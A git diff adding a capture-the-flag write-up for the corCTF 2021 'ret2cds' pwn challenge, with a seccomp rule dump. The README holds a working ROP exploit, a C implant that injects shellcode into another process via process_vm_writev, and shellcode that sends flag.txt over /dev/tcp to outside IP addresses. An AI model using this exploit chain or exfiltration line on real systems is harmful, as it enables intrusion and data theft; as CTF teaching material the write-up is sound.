diff --git a/2021/corctf/ret2cds/.gitignore b/2021/corctf/ret2cds/.gitignore new file mode 100644 index 0000000..ba99e13 --- /dev/null +++ b/2021/corctf/ret2cds/.gitignore @@ -0,0 +1,2 @@ +implant.bin +implant.elf diff --git a/2021/corctf/ret2cds/README.md b/2021/corctf/ret2cds/README.md new file mode 100644 index 0000000..1636e06 --- /dev/null +++ b/2021/corctf/ret2cds/README.md @@ -0,0 +1,519 @@ +# ret2cds + +by [haskal](https://awoo.systems) + +pwn / 497 pts / 6 solves + +>Pwners keep joking about dropping socat and xinetd 0 days so I rewrote netcat in java. I dare you +>to pop a shell on me now :^) +> +>https://ret2cds.be.ax/ +> +>NOTE: Internet is enabled, please use the provided qemu image, and note that this has been tested to +>work in a Debian environment for the Docker host. An Ubuntu host is known to have issues with the +>official solution for the challenge. If you are on Debian, the docker deployment should work for you +>if you don't want to use the qemu image (but not guaranteed). +> +>QEMU Image: ret2cds-qemu.qcow2.gz +> +>QEMU Example: qemu-system-x86_64 -enable-kvm -serial mon:stdio -hda ret2cds.qcow2 -nographic -smp 1 +>-m 1G -net user,hostfwd=tcp::1337-:1337 -net nic +> +>QEMU Username: root (no password) +> +>Docker: ret2cds.tar + +provided files (i'm only providing the binaries here not the whole qemu image cause that is huge): +[ret2cds/](ret2cds/) + +## solution + +pwn time + +basic analysis of the binary shows that it is using seccomp (also, there is seccomp on the docker +image used for the challenge, but the binary's seccomp rules are much more restrictive) + +here's the main function in the dragn + +![main function, it's literally just a 512 byte read into a 256 byte buffer](main.png) + +yea + +ok so first let's get the seccomp rules. for this i used + and just like, had it run the binary, (yes i probably +shouldn't be running CTF binaries on my actual machine but shush) + +this produces output [analysis/ret2cds-seccomp.txt](analysis/ret2cds-seccomp.txt). well... most +things are banned + +so what isn't banned? since the docker contains its own seccomp config, we cross-reference what is +allowed there with what is banned here and find 2 interesting calls which are allowed by both sets +of configurations + +- `process_vm_readv` +- `process_vm_writev` + +these are syscalls that allow reading and writing another process's memory given we have ptrace +permission (in docker everything is root, and also the docker config explicitly adds the ptrace +capability, so yes) + +## initial pwning + +ok we'll get to this later. first we need to bonk the ret2cds process. it's pretty standard just +write the address of write in order to leak the libc base, then jump back to main, then make a +second rop chain to call mmap in libc + +well this part got kind of weird, because pwntools ROP could not identify a good gadget to get +control of r9 which was needed to be set to 0 since it's the offset parameter for mmap (r8 garbage +is OK, it gets ignored for anonymous maps by the kernel). so i turn to my trusty uber-ROP gadget +which is `setcontext` (it's a libc call for restoring all registers from a struct on the stack, goes +with `getcontext`). by manual analysis there is a good place to jump into `setcontext` in order to +get control of r9 + +```asm +// ( in setcontext ) +001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30] +001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88] + 88 00 00 00 +001581ec 31 c0 XOR EAX,EAX +001581ee c3 RET +``` + +for this we just need `RDX` to be loaded as a pointer to the memory we want to load from, which is +easy cause we have gadgets for `RDX`. we pass in a pointer to some random part of `rodata` such that +the address `r9` gets loaded from ends up being `0` + +here's the code so far + +```python +elf = ELF("./ret2cds") +rop = ROP(elf) +rop.write(1, elf.got['write']) + +libc = ELF("./libc.so.6") + +r = remote("ret2cds.be.ax", 38255) +r.recvuntil("warden: ") + +# step 1: get write to print the address of write, then go back to main (0x0040123a) +r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a)) +print(r.recvline()) +print(r.recvline()) +leak = r.recvline()[1:8] +leak = u64(leak.ljust(8, b'\x00')) +print(hex(leak)) + +libc_base = leak - libc.symbols['write'] +print(hex(libc_base)) + +libc.address = libc_base + +# now, make part of the ROP for mmap with pwntools +libc_rop = ROP(libc) +# memorize these args lol, that's +# - addr +# - size +# - 7: PROT_READ | PROT_WRITE | PROT_EXECUTE +# - 0x32: MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE +# - -1: no fd +# - 0: no offset +libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0) +# read moar shellcode into it +libc_rop.read(0, 0x133713370000, 0x10000) + +# handle those pesky remaining args (well, just the last one) +# see the assembly for this gadget above +fucky_r9_gadget = p64(0x581e1 + libc_base) +# load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets +pre_rop = ROP(libc) +pre_rop.rdx = 0x402008 - 0x30 + +# send step 2 exploit, then jump to the shellcode we just mapped +r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000)) +``` + +now we have shellcode. but there's still seccomp..... + +we can produce the final shellcode tho. it just won't work yet because execve is not allowed +(neither is like, anything bash would be running here) + +```python +stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {})) +``` + +please note: if you are doing CTFs in the future referencing this writeup, make sure to keep the IP +address `44.44.127.10` so that i get yr flags >:3 + +ok so the path should be clear: use `process_vm_writev` in order to write _more shellcode_ into +_another process_ + +the only other process is the java netcat replacement + +yikes, + +the java code itself is not that interesting, and not exploitable as far as i can tell. if you're +interested, you can take a look in [Bytecode Viewer](https://github.com/Konloch/bytecode-viewer) or +[JDA](https://github.com/LLVM-but-worse/java-disassembler)[^1] + +from looking at that quickly on the qemu environment, we find something interesting in +`/proc//maps` for the java process + +``` +800000000-800002000 rwxp 00001000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa +800002000-8003b9000 rw-p 00003000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa +8003b9000-800a95000 r--p 003ba000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa +800a95000-800a96000 rw-p 00a96000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa +800a96000-8010a3000 r--p 00a97000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa +``` + +`classes.jsa` has an `rwx` mapping at what looks like a fixed address... that's a great target for +shellcode[^2] + +i'm not super interested in shellcoding a call to `process_vm_writev` ... would be convenient to +write it in C, but i also don't have or want to have (legitimate or illegitimate) a binja license +for their shellcode compiler... + +## how 2 make a C implant 2021 tutorial working (no robux) + +set it to 136 bpm + +make a linker script. it's gonna start at the address where your `mmap` shellcode page is + +```ld +ENTRY(_start) + +MEMORY +{ + RAM (rwx) : ORIGIN = 0x133713370000, LENGTH = 0x10000 +} + +SECTIONS +{ + .text : + { + *(.text.start) + *(.text*) + } + + .rodata : + { + *(.rodata*) + } + + .data : + { + *(.data*) + } + + .bss : + { + _bss = .; + *(.bss*) + *(COMMON) + _ebss = .; + } +} +``` + +now make a makefile (for convenience). we want to call gcc with the magic spell `-nostdlib +-nodefaultlibs -nostdinc -fpic -fno-stack-protector -Os -T stage2.ld` + +basically that's +- don't use any stdlib or standard headers +- make position independent code, skip the stack protector +- optimize for size +- use the given linker script + +then objcopy that into a flat binary + +```make +.PHONY: all clean copy + +CC=gcc +OBJCOPY=objcopy + +all: implant.bin + +clean: + $(RM) *.bin *.elf + +implant.bin: implant.elf + $(OBJCOPY) -O binary $< $@ + +implant.elf: stage2.c stage2.ld + $(CC) -nostdlib -nodefaultlibs -nostdinc -T stage2.ld -fpic -fno-stack-protector \ + -Os -std=gnu11 -Wall -Wextra -o $@ $< +``` + +add some reverb, and stack the layers + +here's some boilerplate C. fun fact, your entrypoint just needs to be at the beginning and it needs +to wipe `.bss` then jump to main. but we also need to redefine literally everything because we opted +to not have any standard headers (this is technically unnecessary, you can use the headers if you +want) + +```c +typedef unsigned char uint8_t; +_Static_assert(sizeof(uint8_t) == 1, "uint8_t wrong size"); +typedef unsigned short uint16_t; +_Static_assert(sizeof(uint16_t) == 2, "uint16_t wrong size"); +typedef unsigned int uint32_t; +_Static_assert(sizeof(uint32_t) == 4, "uint32_t wrong size"); +typedef unsigned long long uint64_t; +_Static_assert(sizeof(uint64_t) == 8, "uint64_t wrong size"); +typedef unsigned int size_t; +typedef int ssize_t; + +#define NULL ((void*)0x0) +#define pid_t unsigned long +#define true 1 +#define false 0 +#define SYS_exit 1 +#define SYS_read 0 +#define SYS_write 1 +#define SYS_process_vm_readv 310 +#define SYS_process_vm_writev 311 + +int main(); +void __attribute__((noreturn)) exit(int); + +void* memset(void* dst, int val, size_t size) { + for (size_t i = 0; i < size; i++) { + ((uint8_t*)dst)[i] = val; + } + return dst; +} + +void* memcpy(void* dst, const void* src, size_t size) { + for (size_t i = 0; i < size; i++) { + ((uint8_t*)dst)[i] = ((uint8_t*)src)[i]; + } + return dst; +} + +extern uint8_t _bss; +extern uint8_t _ebss; +void __attribute__((noreturn)) __attribute__((section(".text.start"))) _start() { + // wipe .bss + memset(&_bss, 0, (&_ebss) - (&_bss)); + // go to main! + exit(main()); +} + +int main() { + // your code here!!! + while(true){} + return 120; +} +``` + +ok now that's done, write some syscall wrappers (i'm being very extra with this) + +```c +ssize_t read(int _fd, void* _buf, size_t _len) { + register int fd asm("rdi") = _fd; + register void* buf asm("rsi") = _buf; + register size_t len asm("rdx") = _len; + register int syscall asm("rax") = SYS_read; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory"); + return ret; +} + +void write(int _fd, const void* _buf, size_t _len) { + register int fd asm("rdi") = _fd; + register const void* buf asm("rsi") = _buf; + register size_t len asm("rdx") = _len; + register int syscall asm("rax") = SYS_write; + asm volatile("syscall" :: "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory"); +} + +void __attribute__((noreturn)) exit(int _code) { + register int code asm("rdi") = _code; + register int syscall asm("rax") = SYS_exit; + asm volatile("syscall" :: "r"(code), "r"(syscall) : "memory"); + __builtin_unreachable(); +} + +ssize_t process_vm_readv(pid_t _pid, + const struct iovec *_local_iov, + unsigned long _liovcnt, + const struct iovec *_remote_iov, + unsigned long _riovcnt, + unsigned long _flags) { + register pid_t pid asm("rdi") = _pid; + register struct iovec* local_iov asm("rsi") = _local_iov; + register unsigned long liovcnt asm("rdx") = _liovcnt; + register struct iovec* remote_iov asm("r10") = _remote_iov; + register unsigned long riovcnt asm("r8") = _riovcnt; + register unsigned long flags asm("r9") = _flags; + register int syscall asm("rax") = SYS_process_vm_readv; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov), + "r"(riovcnt), "r"(flags), "r"(syscall) : "memory"); + return ret; +} + +ssize_t process_vm_writev(pid_t _pid, + const struct iovec *_local_iov, + unsigned long _liovcnt, + const struct iovec *_remote_iov, + unsigned long _riovcnt, + unsigned long _flags) { + register pid_t pid asm("rdi") = _pid; + register struct iovec* local_iov asm("rsi") = _local_iov; + register unsigned long liovcnt asm("rdx") = _liovcnt; + register struct iovec* remote_iov asm("r10") = _remote_iov; + register unsigned long riovcnt asm("r8") = _riovcnt; + register unsigned long flags asm("r9") = _flags; + register int syscall asm("rax") = SYS_process_vm_writev; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov), + "r"(riovcnt), "r"(flags), "r"(syscall) : "memory"); + return ret; +} +``` + +ok _now_ we're ready to send the shellcode using `process_vm_writev` + +## how 2 iovec 2021 tutorial working (no robux) + +so if you've never seen iovecs (first of all you should try kernel pwn, you'll definitely see +iovecs,) basically it's a way to read and/or write multiple addresses in sequence with one syscall. +you pass in an array of these structs + +```c +struct iovec { + void *iov_base; /* Starting address */ + size_t iov_len; /* Number of bytes to transfer */ +}; +``` + +that's how `process_vm_readv` and `process_vm_writev` are working + +now there's one more small detail, which is that we don't know what PID java has. luckily it's low +(usually <10) so we can just spray the shellcode at every process and eventually java will be hit + +```c +// this is: asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/35.237.4.96/1337"], {})) +char* buf = "shellcode here"; +char buf2[0x2000]; + +// write to the previously determined rwx pages in the java process +struct iovec remote_vec = { (void*)0x800000000, 0x2000 }; +// read from a local shellcode buf +struct iovec local_vec = { &buf2[0], 0x2000 }; + +int main() { + print("implant is booted\n"); + + // fill nop sled (0x90 is NOP) + memset(buf2, 0x90, 0x2000); + // add the shellcode at the end + memcpy(&buf2[0x2000 - 186], buf, 186); + + for (int i = 2; i < 100; i++) { + print("sending to pid:"); + print_int(i); + print("\n"); + ssize_t ret = process_vm_writev(i, &local_vec, 1, &remote_vec, 1, 0); + if (ret <= 0) { + print("bad ret!: "); + print_int(-ret); + print("\n"); + } else { + print("GOOD RET\n"); + break; + } + } + print("injection complete\n"); + while(true){} + return 120; +} +``` + +finally you'll probably need to connect to the endpoint again, in order to trigger the java process +to enter the rwx page and execute your shellcode + +the results: +``` +❯ python3 exploit.py +[*] '.../ret2cds' + Arch: amd64-64-little + RELRO: Full RELRO + Stack: No canary found + NX: NX enabled + PIE: No PIE (0x3ff000) + RUNPATH: b'./' +[*] Loaded 14 cached gadgets for '../challenge/chall/ret2cds' +0x0000: 0x40131b pop rdi; ret +0x0008: 0x1 [arg0] rdi = 1 +0x0010: 0x401319 pop rsi; pop r15; ret +0x0018: 0x403fc0 [arg1] rsi = got.write +0x0020: b'iaaajaaa' +0x0028: 0x401030 write +[*] '.../libc.so.6' + Arch: amd64-64-little + RELRO: Partial RELRO + Stack: Canary found + NX: NX enabled + PIE: PIE enabled +0x111040 +[+] Opening connection to ret2cds.be.ax on port 34485: Done +b'\x00\n' +b"lol, you ain't escaping...\n" +0x7f5b8856e040 +0x7f5b8845d000 +[*] Loaded 200 cached gadgets for '../challenge/chall/libc.so.6' +0x0000: 0x7f5b8856256d pop rdx; pop rcx; pop rbx; ret +0x0008: 0x7 [arg2] rdx = 7 +0x0010: 0x32 [arg3] rcx = 50 +0x0018: b'gaaahaaa' +0x0020: 0x7f5b88484529 pop rsi; ret +0x0028: 0x10000 [arg1] rsi = 65536 +0x0030: 0x7f5b88483b72 pop rdi; ret +0x0038: 0x133713370000 [arg0] rdi = 21127266500608 +0x0040: 0x7f5b88578890 mmap +0x0048: 0x7f5b885791e1 pop rdx; pop r12; ret +0x0050: 0x10000 [arg2] rdx = 65536 +0x0058: b'waaaxaaa' +0x0060: 0x7f5b88484529 pop rsi; ret +0x0068: 0x133713370000 [arg1] rsi = 21127266500608 +0x0070: 0x7f5b88483b72 pop rdi; ret +0x0078: 0x0 [arg0] rdi = 0 +0x0080: 0x7f5b8856dfa0 read +b'm%V\x88[\x7f\x00\x00\x07\x00\x00\x00\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00gaaahaaa)EH\x88[\x7f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00r;H\x88[\x7f\x00\x00\x00\x007\x137\x13\x00\x00\x90\x88W\x88[\x7f\x00\x00\xe1\x91W\x88[\x7f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00waaaxaaa) +EH\x88[\x7f\x00\x00\x00\x007\x137\x13\x00\x00r;H\x88[\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xdfV\x88[\x7f\x00\x00' +make: Nothing to be done for 'all'. +[*] Switching to interactive mode +🚨 Due to the recent security breaches, we have no choice but to lock you up in jail! 🚨 +And just to avoid all those socat/xinetd 0-days you and your pwn friends brag about... +I rewrote netcat in Java ☕. +Nothing can go wrong with a language used on over 13 billion devices ™. + +\x00nter your appeal to the warden: \x00 +lol, you ain't escaping... +\x00[*] Got EOF while reading in interactive +$ +[*] Closed connection to ret2cds.be.ax port 34485 +[*] Got EOF while sending in interactive +``` + +meanwhile on yr listening server +``` +$ while true; do nc -vlp 1337; done +Ncat: Version 7.70 ( https://nmap.org/ncat ) +Ncat: Listening on :::1337 +Ncat: Listening on 0.0.0.0:1337 +Ncat: Connection from 161.35.128.177. +Ncat: Connection from 161.35.128.177:43098. +corctf{r0p_t0_5h3llc0d3_t0_pWn1n1g_j@v@_rwX_cDs_af179e546321dfac13370} +``` + +(idk what the 'cds' part of the challege name is supposed to mean. return to 💿?) + +[^1]: JDA is just a cleaned up and slightly prettified fork of Bytecode Viewer, but it's also behind + Bytecode Viewer in terms of a few features (mainly Android) + +[^2]: in recent versions of openjdk, this is no longer the case (i think). sad :( + luckily this challenge is using an older version diff --git a/2021/corctf/ret2cds/analysis/ret2cds-seccomp.txt b/2021/corctf/ret2cds/analysis/ret2cds-seccomp.txt new file mode 100644 index 0000000..340e123 --- /dev/null +++ b/2021/corctf/ret2cds/analysis/ret2cds-seccomp.txt @@ -0,0 +1,651 @@ + line CODE JT JF K +================================= + 0000: 0x20 0x00 0x00 0x00000004 A = arch + 0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003 + 0002: 0x06 0x00 0x00 0x00000000 return KILL + 0003: 0x20 0x00 0x00 0x00000000 A = sys_number + 0004: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0006 + 0005: 0x06 0x00 0x00 0x00000000 return KILL + 0006: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0008 + 0007: 0x06 0x00 0x00 0x00000000 return KILL + 0008: 0x15 0x00 0x01 0x00000003 if (A != close) goto 0010 + 0009: 0x06 0x00 0x00 0x00000000 return KILL + 0010: 0x15 0x00 0x01 0x00000004 if (A != stat) goto 0012 + 0011: 0x06 0x00 0x00 0x00000000 return KILL + 0012: 0x15 0x00 0x01 0x00000005 if (A != fstat) goto 0014 + 0013: 0x06 0x00 0x00 0x00000000 return KILL + 0014: 0x15 0x00 0x01 0x00000006 if (A != lstat) goto 0016 + 0015: 0x06 0x00 0x00 0x00000000 return KILL + 0016: 0x15 0x00 0x01 0x00000007 if (A != poll) goto 0018 + 0017: 0x06 0x00 0x00 0x00000000 return KILL + 0018: 0x15 0x00 0x01 0x00000008 if (A != lseek) goto 0020 + 0019: 0x06 0x00 0x00 0x00000000 return KILL + 0020: 0x15 0x00 0x01 0x0000000c if (A != brk) goto 0022 + 0021: 0x06 0x00 0x00 0x00000000 return KILL + 0022: 0x15 0x00 0x01 0x0000000d if (A != rt_sigaction) goto 0024 + 0023: 0x06 0x00 0x00 0x00000000 return KILL + 0024: 0x15 0x00 0x01 0x0000000e if (A != rt_sigprocmask) goto 0026 + 0025: 0x06 0x00 0x00 0x00000000 return KILL + 0026: 0x15 0x00 0x01 0x0000000f if (A != rt_sigreturn) goto 0028 + 0027: 0x06 0x00 0x00 0x00000000 return KILL + 0028: 0x15 0x00 0x01 0x00000010 if (A != ioctl) goto 0030 + 0029: 0x06 0x00 0x00 0x00000000 return KILL + 0030: 0x15 0x00 0x01 0x00000011 if (A != pread64) goto 0032 + 0031: 0x06 0x00 0x00 0x00000000 return KILL + 0032: 0x15 0x00 0x01 0x00000012 if (A != pwrite64) goto 0034 + 0033: 0x06 0x00 0x00 0x00000000 return KILL + 0034: 0x15 0x00 0x01 0x00000013 if (A != readv) goto 0036 + 0035: 0x06 0x00 0x00 0x00000000 return KILL + 0036: 0x15 0x00 0x01 0x00000014 if (A != writev) goto 0038 + 0037: 0x06 0x00 0x00 0x00000000 return KILL + 0038: 0x15 0x00 0x01 0x00000015 if (A != access) goto 0040 + 0039: 0x06 0x00 0x00 0x00000000 return KILL + 0040: 0x15 0x00 0x01 0x00000016 if (A != pipe) goto 0042 + 0041: 0x06 0x00 0x00 0x00000000 return KILL + 0042: 0x15 0x00 0x01 0x00000017 if (A != select) goto 0044 + 0043: 0x06 0x00 0x00 0x00000000 return KILL + 0044: 0x15 0x00 0x01 0x00000018 if (A != sched_yield) goto 0046 + 0045: 0x06 0x00 0x00 0x00000000 return KILL + 0046: 0x15 0x00 0x01 0x00000019 if (A != mremap) goto 0048 + 0047: 0x06 0x00 0x00 0x00000000 return KILL + 0048: 0x15 0x00 0x01 0x0000001a if (A != msync) goto 0050 + 0049: 0x06 0x00 0x00 0x00000000 return KILL + 0050: 0x15 0x00 0x01 0x0000001b if (A != mincore) goto 0052 + 0051: 0x06 0x00 0x00 0x00000000 return KILL + 0052: 0x15 0x00 0x01 0x0000001c if (A != madvise) goto 0054 + 0053: 0x06 0x00 0x00 0x00000000 return KILL + 0054: 0x15 0x00 0x01 0x0000001d if (A != shmget) goto 0056 + 0055: 0x06 0x00 0x00 0x00000000 return KILL + 0056: 0x15 0x00 0x01 0x0000001e if (A != shmat) goto 0058 + 0057: 0x06 0x00 0x00 0x00000000 return KILL + 0058: 0x15 0x00 0x01 0x0000001f if (A != shmctl) goto 0060 + 0059: 0x06 0x00 0x00 0x00000000 return KILL + 0060: 0x15 0x00 0x01 0x00000020 if (A != dup) goto 0062 + 0061: 0x06 0x00 0x00 0x00000000 return KILL + 0062: 0x15 0x00 0x01 0x00000021 if (A != dup2) goto 0064 + 0063: 0x06 0x00 0x00 0x00000000 return KILL + 0064: 0x15 0x00 0x01 0x00000022 if (A != pause) goto 0066 + 0065: 0x06 0x00 0x00 0x00000000 return KILL + 0066: 0x15 0x00 0x01 0x00000023 if (A != nanosleep) goto 0068 + 0067: 0x06 0x00 0x00 0x00000000 return KILL + 0068: 0x15 0x00 0x01 0x00000024 if (A != getitimer) goto 0070 + 0069: 0x06 0x00 0x00 0x00000000 return KILL + 0070: 0x15 0x00 0x01 0x00000025 if (A != alarm) goto 0072 + 0071: 0x06 0x00 0x00 0x00000000 return KILL + 0072: 0x15 0x00 0x01 0x00000026 if (A != setitimer) goto 0074 + 0073: 0x06 0x00 0x00 0x00000000 return KILL + 0074: 0x15 0x00 0x01 0x00000027 if (A != getpid) goto 0076 + 0075: 0x06 0x00 0x00 0x00000000 return KILL + 0076: 0x15 0x00 0x01 0x00000028 if (A != sendfile) goto 0078 + 0077: 0x06 0x00 0x00 0x00000000 return KILL + 0078: 0x15 0x00 0x01 0x00000029 if (A != socket) goto 0080 + 0079: 0x06 0x00 0x00 0x00000000 return KILL + 0080: 0x15 0x00 0x01 0x0000002a if (A != connect) goto 0082 + 0081: 0x06 0x00 0x00 0x00000000 return KILL + 0082: 0x15 0x00 0x01 0x0000002b if (A != accept) goto 0084 + 0083: 0x06 0x00 0x00 0x00000000 return KILL + 0084: 0x15 0x00 0x01 0x0000002c if (A != sendto) goto 0086 + 0085: 0x06 0x00 0x00 0x00000000 return KILL + 0086: 0x15 0x00 0x01 0x0000002d if (A != recvfrom) goto 0088 + 0087: 0x06 0x00 0x00 0x00000000 return KILL + 0088: 0x15 0x00 0x01 0x0000002e if (A != sendmsg) goto 0090 + 0089: 0x06 0x00 0x00 0x00000000 return KILL + 0090: 0x15 0x00 0x01 0x0000002f if (A != recvmsg) goto 0092 + 0091: 0x06 0x00 0x00 0x00000000 return KILL + 0092: 0x15 0x00 0x01 0x00000030 if (A != shutdown) goto 0094 + 0093: 0x06 0x00 0x00 0x00000000 return KILL + 0094: 0x15 0x00 0x01 0x00000031 if (A != bind) goto 0096 + 0095: 0x06 0x00 0x00 0x00000000 return KILL + 0096: 0x15 0x00 0x01 0x00000032 if (A != listen) goto 0098 + 0097: 0x06 0x00 0x00 0x00000000 return KILL + 0098: 0x15 0x00 0x01 0x00000033 if (A != getsockname) goto 0100 + 0099: 0x06 0x00 0x00 0x00000000 return KILL + 0100: 0x15 0x00 0x01 0x00000034 if (A != getpeername) goto 0102 + 0101: 0x06 0x00 0x00 0x00000000 return KILL + 0102: 0x15 0x00 0x01 0x00000035 if (A != socketpair) goto 0104 + 0103: 0x06 0x00 0x00 0x00000000 return KILL + 0104: 0x15 0x00 0x01 0x00000036 if (A != setsockopt) goto 0106 + 0105: 0x06 0x00 0x00 0x00000000 return KILL + 0106: 0x15 0x00 0x01 0x00000037 if (A != getsockopt) goto 0108 + 0107: 0x06 0x00 0x00 0x00000000 return KILL + 0108: 0x15 0x00 0x01 0x00000038 if (A != clone) goto 0110 + 0109: 0x06 0x00 0x00 0x00000000 return KILL + 0110: 0x15 0x00 0x01 0x00000039 if (A != fork) goto 0112 + 0111: 0x06 0x00 0x00 0x00000000 return KILL + 0112: 0x15 0x00 0x01 0x0000003a if (A != vfork) goto 0114 + 0113: 0x06 0x00 0x00 0x00000000 return KILL + 0114: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0116 + 0115: 0x06 0x00 0x00 0x00000000 return KILL + 0116: 0x15 0x00 0x01 0x0000003d if (A != wait4) goto 0118 + 0117: 0x06 0x00 0x00 0x00000000 return KILL + 0118: 0x15 0x00 0x01 0x0000003e if (A != kill) goto 0120 + 0119: 0x06 0x00 0x00 0x00000000 return KILL + 0120: 0x15 0x00 0x01 0x0000003f if (A != uname) goto 0122 + 0121: 0x06 0x00 0x00 0x00000000 return KILL + 0122: 0x15 0x00 0x01 0x00000040 if (A != semget) goto 0124 + 0123: 0x06 0x00 0x00 0x00000000 return KILL + 0124: 0x15 0x00 0x01 0x00000041 if (A != semop) goto 0126 + 0125: 0x06 0x00 0x00 0x00000000 return KILL + 0126: 0x15 0x00 0x01 0x00000042 if (A != semctl) goto 0128 + 0127: 0x06 0x00 0x00 0x00000000 return KILL + 0128: 0x15 0x00 0x01 0x00000043 if (A != shmdt) goto 0130 + 0129: 0x06 0x00 0x00 0x00000000 return KILL + 0130: 0x15 0x00 0x01 0x00000044 if (A != msgget) goto 0132 + 0131: 0x06 0x00 0x00 0x00000000 return KILL + 0132: 0x15 0x00 0x01 0x00000045 if (A != msgsnd) goto 0134 + 0133: 0x06 0x00 0x00 0x00000000 return KILL + 0134: 0x15 0x00 0x01 0x00000046 if (A != msgrcv) goto 0136 + 0135: 0x06 0x00 0x00 0x00000000 return KILL + 0136: 0x15 0x00 0x01 0x00000047 if (A != msgctl) goto 0138 + 0137: 0x06 0x00 0x00 0x00000000 return KILL + 0138: 0x15 0x00 0x01 0x00000048 if (A != fcntl) goto 0140 + 0139: 0x06 0x00 0x00 0x00000000 return KILL + 0140: 0x15 0x00 0x01 0x00000049 if (A != flock) goto 0142 + 0141: 0x06 0x00 0x00 0x00000000 return KILL + 0142: 0x15 0x00 0x01 0x0000004a if (A != fsync) goto 0144 + 0143: 0x06 0x00 0x00 0x00000000 return KILL + 0144: 0x15 0x00 0x01 0x0000004b if (A != fdatasync) goto 0146 + 0145: 0x06 0x00 0x00 0x00000000 return KILL + 0146: 0x15 0x00 0x01 0x0000004c if (A != truncate) goto 0148 + 0147: 0x06 0x00 0x00 0x00000000 return KILL + 0148: 0x15 0x00 0x01 0x0000004d if (A != ftruncate) goto 0150 + 0149: 0x06 0x00 0x00 0x00000000 return KILL + 0150: 0x15 0x00 0x01 0x0000004e if (A != getdents) goto 0152 + 0151: 0x06 0x00 0x00 0x00000000 return KILL + 0152: 0x15 0x00 0x01 0x0000004f if (A != getcwd) goto 0154 + 0153: 0x06 0x00 0x00 0x00000000 return KILL + 0154: 0x15 0x00 0x01 0x00000050 if (A != chdir) goto 0156 + 0155: 0x06 0x00 0x00 0x00000000 return KILL + 0156: 0x15 0x00 0x01 0x00000051 if (A != fchdir) goto 0158 + 0157: 0x06 0x00 0x00 0x00000000 return KILL + 0158: 0x15 0x00 0x01 0x00000052 if (A != rename) goto 0160 + 0159: 0x06 0x00 0x00 0x00000000 return KILL + 0160: 0x15 0x00 0x01 0x00000053 if (A != mkdir) goto 0162 + 0161: 0x06 0x00 0x00 0x00000000 return KILL + 0162: 0x15 0x00 0x01 0x00000054 if (A != rmdir) goto 0164 + 0163: 0x06 0x00 0x00 0x00000000 return KILL + 0164: 0x15 0x00 0x01 0x00000055 if (A != creat) goto 0166 + 0165: 0x06 0x00 0x00 0x00000000 return KILL + 0166: 0x15 0x00 0x01 0x00000056 if (A != link) goto 0168 + 0167: 0x06 0x00 0x00 0x00000000 return KILL + 0168: 0x15 0x00 0x01 0x00000057 if (A != unlink) goto 0170 + 0169: 0x06 0x00 0x00 0x00000000 return KILL + 0170: 0x15 0x00 0x01 0x00000058 if (A != symlink) goto 0172 + 0171: 0x06 0x00 0x00 0x00000000 return KILL + 0172: 0x15 0x00 0x01 0x00000059 if (A != readlink) goto 0174 + 0173: 0x06 0x00 0x00 0x00000000 return KILL + 0174: 0x15 0x00 0x01 0x0000005a if (A != chmod) goto 0176 + 0175: 0x06 0x00 0x00 0x00000000 return KILL + 0176: 0x15 0x00 0x01 0x0000005b if (A != fchmod) goto 0178 + 0177: 0x06 0x00 0x00 0x00000000 return KILL + 0178: 0x15 0x00 0x01 0x0000005c if (A != chown) goto 0180 + 0179: 0x06 0x00 0x00 0x00000000 return KILL + 0180: 0x15 0x00 0x01 0x0000005d if (A != fchown) goto 0182 + 0181: 0x06 0x00 0x00 0x00000000 return KILL + 0182: 0x15 0x00 0x01 0x0000005e if (A != lchown) goto 0184 + 0183: 0x06 0x00 0x00 0x00000000 return KILL + 0184: 0x15 0x00 0x01 0x0000005f if (A != umask) goto 0186 + 0185: 0x06 0x00 0x00 0x00000000 return KILL + 0186: 0x15 0x00 0x01 0x00000061 if (A != getrlimit) goto 0188 + 0187: 0x06 0x00 0x00 0x00000000 return KILL + 0188: 0x15 0x00 0x01 0x00000062 if (A != getrusage) goto 0190 + 0189: 0x06 0x00 0x00 0x00000000 return KILL + 0190: 0x15 0x00 0x01 0x00000063 if (A != sysinfo) goto 0192 + 0191: 0x06 0x00 0x00 0x00000000 return KILL + 0192: 0x15 0x00 0x01 0x00000064 if (A != times) goto 0194 + 0193: 0x06 0x00 0x00 0x00000000 return KILL + 0194: 0x15 0x00 0x01 0x00000065 if (A != ptrace) goto 0196 + 0195: 0x06 0x00 0x00 0x00000000 return KILL + 0196: 0x15 0x00 0x01 0x00000066 if (A != getuid) goto 0198 + 0197: 0x06 0x00 